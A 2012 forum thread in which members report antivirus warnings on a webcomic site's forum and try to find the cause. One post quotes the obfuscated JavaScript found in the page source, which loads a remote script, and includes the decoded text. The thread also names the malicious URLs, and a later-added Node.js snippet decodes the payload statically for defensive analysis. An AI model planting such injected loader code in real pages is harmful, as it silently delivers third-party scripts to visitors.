> Malware?
BigMistake
post Feb 6 2012, 03:03 PM
Post #1


Obsessive
******

Group: Established Members
Posts: 240
Joined: 21-September 11
Member No.: 17,519
Gender: Male



This is something I got a few hours ago while trying to get to the forums:



Scary stuff!
Mata
post Feb 8 2012, 12:24 PM
Post #2


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,167
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Thanks. I monitor all changes to pages on my domain, so if anything has got through that then it's at a low level that I don't have access to. I've asked my hosting company to run a full scan of my domains to see if they can spot where an exploit has been inserted.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Hobbes
post Feb 16 2012, 04:39 PM
Post #3


Advice for the young at heart
************

Group: Moderators
Posts: 2,705
Joined: 26-February 03
From: Essex, UK
Member No.: 33
Gender: Male



I also just had an infection warning pop up from the Avast webshield as I visited the forum's main page (.../forums).

Unfortunately, I missed the details, and for some reason the log is empty, so I can't be much more help than that :/


Mata
post Feb 27 2012, 08:06 PM
Post #4





Thanks - I've bumped the host admins again.


Hobbes
post Mar 2 2012, 12:59 PM
Post #5





Avast picked up this today upon opening the main forum page:

Object: http://wtgrvwohvgusoire.nl.ai/main.php?page=300c6519e5f2b0af
Infection: JS:Downloader-gen@bhv [Expl]
Process: C:\Program Files\Internet Explorer\iexplore.exe


Mata
post Mar 17 2012, 04:00 PM
Post #6





Thanks... But I'm really not sure what to do. We've scanned the entire site directory and the database, so there isn't anywhere else to look.

I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.

If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error. If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on.

Thanks!


BigMistake
post Mar 17 2012, 08:41 PM
Post #7





QUOTE (Mata @ Mar 17 2012, 05:00 PM)
Thanks... But I'm really not sure what to do. We've scanned the entire site directory and the database, so there isn't anywhere else to look.

I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.

If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error. If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on.

Thanks!


It hasn't happened to me since then, maybe some temporary XSS?
Hobbes
post Apr 16 2012, 07:13 AM
Post #8





This came up this morning on the main forum page:

URL: http://laykz.tetuku.com/images.php?t
Process: file://C:\Program Files (x86)\Internet E...
Infection: al

Unfortunately I clicked away before I viewed the source. I did go 'back' to the page, but I'm not sure whether it would show it up or not. I took a look through the source but didn't find anything unusual except a batch of URL code which, when decoded, is a javascript. It doesn't look malicious though, but does have a website reference which I don't see in any advertising or anything? It's probably entirely normal (as I don't really have any real experience with javascript beyond 'Hello World') but I'll post the info here anyway. I reloaded the page and the code is still there. I only really query it because it looks unusual as it's in URL encoded text. *shrugs*

It was at line 2024:

CODE
<script type="text/javascript">document.write(unescape('<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%20%63%2E%74%6F%53%74%72%69%6E%67%28%61%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%31%2E%32%28%5C%27%3C%30%20%33%3D%22%34%2F%35%22%20%36%3D%22%37%3A%2F%2F%38%2E%39%2E%61%2F%62%2F%63%2F%64%2E%65%22%3E%3C%2F%30%3E%5C%27%29%27%2C%31%35%2C%31%35%2C%27%73%63%72%69%70%74%7C%64%6F%63%75%6D%65%6E%74%7C%77%72%69%74%65%7C%74%79%70%65%7C%74%65%78%74%7C%6A%61%76%61%73%63%72%69%70%74%7C%73%72%63%7C%68%74%74%70%7C%67%6F%62%75%79%6C%6F%63%61%6C%7C%63%6F%6D%7C%61%75%7C%63%6F%6D%70%6F%6E%65%6E%74%73%7C%63%6F%6D%5F%63%6E%74%7C%63%6E%74%7C%6A%73%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3C%2F%73%63%72%69%70%74%3E'))</script>


Decoded it reads:

CODE
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',15,15,'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'),0,{}))</script>')


I don't really know what gobuylocal stuff is? Again, it doesn't look overly malicious, but I just don't get why it is there?


CrazyFooIAintGet...
post Apr 17 2012, 08:50 AM
Post #9


Has been kidnapped by gerbils and forced to post on here repeatedly
***********

Group: Established Members
Posts: 1,088
Joined: 18-September 03
From: London
Member No.: 606
Gender: Female



It's evaluating some obfuscated code.

Looks like it injects another script into the page.

CODE
<script type="text/javascript">
eval(
    function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(
                '1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',
        15,
        15,
        'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'), // this doesn't look good.
        0,
        {}
    )

)
</script>


--------------------
Kung fu fighting from 25th April 2010
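Hobbes' URL-encoded snippet and CrazyFooIAintGet...'s unpacked reading of it can be checked without ever running the payload. The following is an added example, not code from the thread or the forum software: it decodes both layers (the percent-encoding handed to unescape(), then the "p,a,c,k,e,r" packer call handed to eval()) statically and lists the remote script the injection would load. It assumes Node.js; the sample input is constructed from the two code blocks posted above.

```javascript
// Added example (not code from the thread): decode the two-layer obfuscated
// script posted above without ever evaluating it. Layer 1 is percent-encoding
// handed to unescape(); layer 2 is a "p,a,c,k,e,r" packer call handed to eval().

// Layer 1: the %XX / %uXXXX decoding that the legacy unescape() performs.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Layer 2: rebuild the packer's dictionary and substitute tokens, mirroring the
// packer's own loop: index c written in base a stands for word k[c].
function unpack(p, a, c, k) {
  const enc = (n) => n.toString(a);
  const table = Object.create(null);
  while (c--) table[enc(c)] = k[c] || enc(c);
  return p.replace(/\b\w+\b/g, (w) => (w in table ? table[w] : w));
}

// Pull the packer's arguments out of the decoded script text with a regex so
// nothing is executed. Only the argument shape seen in this thread is handled.
function extractPackerArgs(script) {
  const m = /\}\('((?:\\.|[^'\\])*)',(\d+),(\d+),'([^']*)'\.split\('\|'\)/.exec(script);
  if (!m) throw new Error('packer call not found');
  const p = m[1].replace(/\\(.)/g, '$1'); // undo the \' escapes inside the p literal
  return { p, a: Number(m[2]), c: Number(m[3]), k: m[4].split('|') };
}

function decode(encoded) {
  const { p, a, c, k } = extractPackerArgs(percentDecode(encoded));
  return unpack(p, a, c, k);
}

// What a defender wants from the result: the remote script(s) the injection loads.
function remoteScriptSources(decoded) {
  return [...decoded.matchAll(/src="([^"]+)"/g)].map((m) => m[1]);
}

// Constructed sample: the first bytes are copied verbatim from the percent-encoded
// string in the post; the rest is the already-decoded text from the same post
// (String.raw keeps the backslashes exactly as they appear in the page source).
const SAMPLE =
  '<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28' +
  String.raw`function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}` +
  String.raw`('1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',15,15,'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'),0,{}))</script>`;

console.log(decode(SAMPLE));
console.log(remoteScriptSources(decode(SAMPLE)));
```

The decoded result is a document.write() of a script tag pointing at a third-party host, which is the line to search for (and block) in the forum's templates, database and error logs.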
Mata
post Apr 27 2012, 06:29 PM
Post #10





Sorry, I didn't see this message when you first posted it.

I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.

When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot.


BigMistake
post Apr 27 2012, 07:32 PM
Post #11





QUOTE (Mata @ Apr 27 2012, 08:29 PM)
Sorry, I didn't see this message when you first posted it.

I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.

When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot.


Are you sure you need to dish out that kind of money? I'm not sure how the forum is set up but I'd imagine it involves a database. Couldn't you use the current database when trying out new forum software?
CrazyFooIAintGet...
post Apr 28 2012, 08:27 AM
Post #12





You need to import everything into the new format though, which is going to be difficult if there isn't already a built-in tool for that.

You could just archive the current forum and start over, but everyone would need to create new accounts.


Mata
post May 11 2012, 09:38 AM
Post #13





Ouch. No, I'd rather not archive everything.

Yes, the problem comes in that there aren't automatic updaters or converters. If I get it all moved to modern software then I should be able to do that in the future, but this time I'll have to bite the bullet and get someone to do it the hard way.

